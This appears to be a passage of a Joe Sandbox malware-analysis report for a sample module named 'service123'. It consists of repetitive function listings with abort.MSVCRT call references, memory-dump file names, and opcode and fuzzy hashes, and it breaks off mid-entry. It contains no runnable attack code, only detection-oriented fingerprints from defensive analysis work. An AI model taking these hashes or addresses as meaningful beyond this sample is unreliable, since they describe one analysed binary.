abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 89f511ee8f725ae29570188da5996e3e450a1ccf56c7e8a92a64c9ac463cf012
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 58F027306DC06F8B87207A5F4020DA17337BA57B0DBA90452EC806BE5DC2329407CA49

Function 6C29BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca43c19bc8a59888d740ca5bc04880383610d32967b6131046c182f05cbfd34
Instruction ID: 2ba95e6b5e914127b99120fc14af30469dc6c1a8f1fe2036aaf194aa1b070e7b
Opcode Fuzzy Hash: 2ca43c19bc8a59888d740ca5bc04880383610d32967b6131046c182f05cbfd34
Instruction Fuzzy Hash: 13019073A59A2F07D3204E77C4E1361B6A25F83358F198669ED7717E8BC2349C09DB40

Function 6C29BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 2cf9a09cd6903aca3d0d4fed0e1c80955e489683b37d039d0a1dfff305eafc3e
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: A7E08C3268A31D4B85207DDAB4509AAB2689B43798F211C29CD08A3D05D362E85C8AC2

Function 6C29BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 0f17fe5717231d2d77c2979861a9f0cd0ac3f4a5454987518539f9dabf0046db
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: B6D05B3069D11F4787046E5A4054C69F2B55B463487295855C845A3D05D631D90A4904

Function 6C29BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 5e2599de207707af3c7f11c889358354e0ca28c9b2e611990b5514d9eb48ce4c
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 5DD0173028970D8F8300FF8AD1948A9B7F9AB4B305B019D6AC80897F25D632D808CE05

Function 6C29BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: db2add55e3f42133fb493708dce147e18a368d64115d740370a98112ed305817
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 2FC01221AD931D4BC1103DDB5050B76F2A59B07744F222C198C4933E018B72EC098945

Function 6C29BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 7329901f74b1158dca1d7df756fe1524122f7a746e759abb8b6dbd994aea47e0
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: 9EC0123579921D8B8210BEC690509A9B274AB5B344F112C54CC0173F058771E80DC945

Function 6C29BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 0cb827bf0a5b75fb8c78f26bdd5b67c03c54cdd472365a4cd23059432213c953
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 96C08C30ADC31D4740003D8B10A0978B2B90707364B162D14CC0433F01CA23D84D8848

Function 6C29C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df394489d6221d2e5711d4448215041ab998738d00ce37be52fe048d273749d2
Instruction ID: 42d9ac1b9314d3f2f70a03d135685f831ba1d4bedfb0b45de218fcec00f60689
Opcode Fuzzy Hash: df394489d6221d2e5711d4448215041ab998738d00ce37be52fe048d273749d2
